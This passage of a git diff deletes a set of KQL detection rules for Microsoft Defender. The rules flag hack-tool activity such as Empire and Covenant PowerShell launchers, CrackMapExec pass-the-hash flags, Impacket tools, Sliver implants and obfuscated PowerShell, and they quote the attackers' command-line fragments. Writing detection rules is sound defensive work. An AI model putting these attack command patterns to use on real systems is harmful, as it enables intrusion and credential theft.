ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'"))) \ No newline at end of file diff --git a/Execution/File_Encryption_Using_Gpg4win.kql b/Execution/File_Encryption_Using_Gpg4win.kql deleted file mode 100644 index b2f433f3..00000000 --- a/Execution/File_Encryption_Using_Gpg4win.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/09 -// Level: medium -// Description: Detects usage of Gpg4win to encrypt files -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql b/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql deleted file mode 100644 index 2f85709f..00000000 --- a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the creation of files with an executable or script extension by an Office application. -// Tags: attack.t1204.002, attack.execution -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not(((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com")))) \ No newline at end of file diff --git a/Execution/Forfiles_Command_Execution.kql b/Execution/Forfiles_Command_Execution.kql deleted file mode 100644 index 1805c4a9..00000000 --- a/Execution/Forfiles_Command_Execution.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022/06/14 -// Level: medium -// Description: Detects the execution of "forfiles" with the "/c" flag. -While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. -Can be used to bypass application whitelisting. - -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe") \ No newline at end of file diff --git a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql b/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql deleted file mode 100644 index 5a0c3e9b..00000000 --- a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/03/02 -// Level: medium -// Description: A symbolic link is a type of file that contains a reference to another file. -This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt - -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql b/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql deleted file mode 100644 index 030862ee..00000000 --- a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: high -// Description: Detects any GAC DLL being loaded by an Office Product -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql deleted file mode 100644 index 25771e32..00000000 --- a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql b/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql deleted file mode 100644 index 10ec08bc..00000000 --- a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2020/06/04 -// Level: high -// Description: Detects suspicious command lines used in Covenant luanchers -// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA") \ No newline at end of file diff --git a/Execution/HackTool_-_CrackMapExec_Execution.kql b/Execution/HackTool_-_CrackMapExec_Execution.kql deleted file mode 100644 index 2272759d..00000000 --- a/Execution/HackTool_-_CrackMapExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 -DeviceProcessEvents -| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql b/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql deleted file mode 100644 index 9f4071c7..00000000 --- a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2020/05/22 -// Level: high -// Description: Detects various execution patterns of the CrackMapExec pentesting framework -// Tags: attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106 -DeviceProcessEvents -| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc " \ No newline at end of file diff --git a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql deleted file mode 100644 index bc2833d5..00000000 --- a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2020/05/22 -// Level: high -// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql b/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql deleted file mode 100644 index b509eb86..00000000 --- a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/04/20 -// Level: high -// Description: Detects suspicious powershell command line parameters used in Empire -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand " \ No newline at end of file diff --git a/Execution/HackTool_-_Impacket_Tools_Execution.kql b/Execution/HackTool_-_Impacket_Tools_Execution.kql deleted file mode 100644 index dd80528d..00000000 --- a/Execution/HackTool_-_Impacket_Tools_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/24 -// Level: high -// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) -// Tags: attack.execution, attack.t1557.001 -DeviceProcessEvents -| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe") \ No newline at end of file diff --git a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql b/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql deleted file mode 100644 index 9f71a8e1..00000000 --- a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) -// Date: 2022/05/24 -// Level: medium -// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe")) \ No newline at end of file diff --git a/Execution/HackTool_-_Koadic_Execution.kql b/Execution/HackTool_-_Koadic_Execution.kql deleted file mode 100644 index 48fb0d16..00000000 --- a/Execution/HackTool_-_Koadic_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: wagga, Jonhnathan Ribeiro, oscd.community -// Date: 2020/01/12 -// Level: high -// Description: Detects command line parameters used by Koadic hack tool -// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007 -DeviceProcessEvents -| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql deleted file mode 100644 index 3ef522cf..00000000 --- a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch -// Date: 2019/09/03 -// Level: high -// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe")) \ No newline at end of file diff --git a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql deleted file mode 100644 index 90d50234..00000000 --- a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alexander Rausch -// Date: 2020/06/24 -// Level: high -// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility -// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql b/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql deleted file mode 100644 index 222c3f7c..00000000 --- a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022/08/25 -// Level: critical -// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8" \ No newline at end of file diff --git a/Execution/HackTool_-_Stracciatella_Execution.kql b/Execution/HackTool_-_Stracciatella_Execution.kql deleted file mode 100644 index fbafb340..00000000 --- a/Execution/HackTool_-_Stracciatella_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. -// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001 -DeviceProcessEvents -| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")) \ No newline at end of file diff --git a/Execution/HackTool_-_WinPwn_Execution.kql b/Execution/HackTool_-_WinPwn_Execution.kql deleted file mode 100644 index bd621578..00000000 --- a/Execution/HackTool_-_WinPwn_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/12/04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - -// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 -DeviceProcessEvents -| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 2a00e9b4..00000000 --- a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2023/02/14 -// Level: medium -// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information -// Tags: attack.execution, attack.t1047, car.2016-03-002 -DeviceProcessEvents -| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql b/Execution/Hidden_Powershell_in_Link_File_Pattern.kql deleted file mode 100644 index e96c12e8..00000000 --- a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/06 -// Level: medium -// Description: Detects events that appear when a user click on a link file with a powershell command in it -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" \ No newline at end of file diff --git a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql deleted file mode 100644 index 914b3568..00000000 --- a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. - -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql b/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql deleted file mode 100644 index a95b8202..00000000 --- a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/10 -// Level: medium -// Description: Detects powershell scripts that import modules from suspicious directories -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\" \ No newline at end of file diff --git a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql deleted file mode 100644 index 786d5065..00000000 --- a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: A. Sungurov , oscd.community -// Date: 2020/10/12 -// Level: low -// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/Execution/Insecure_Transfer_Via_Curl.EXE.kql b/Execution/Insecure_Transfer_Via_Curl.EXE.kql deleted file mode 100644 index c4a97253..00000000 --- a/Execution/Insecure_Transfer_Via_Curl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/30 -// Level: medium -// Description: Detects execution of "curl.exe" with the "--insecure" flag. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql b/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql deleted file mode 100644 index 5c46388e..00000000 --- a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman, Florian Roth (Nextron Systems), frack113 -// Date: 2020/04/21 -// Level: medium -// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. -The manifest option enables you to install an application by passing in a YAML file directly to the client. -Winget can be used to download and install exe, msi or msix files later. - -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest") \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql b/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql deleted file mode 100644 index 4af2d38a..00000000 --- a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/13 -// Level: high -// Description: Detects Obfuscated use of Clip.exe to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql deleted file mode 100644 index b42471c1..00000000 --- a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2020/10/18 -// Level: medium -// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii") \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql deleted file mode 100644 index c693d26a..00000000 --- a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community -// Date: 2019/11/08 -// Level: high -// Description: Detects all variations of obfuscated powershell IEX invocation code generated by 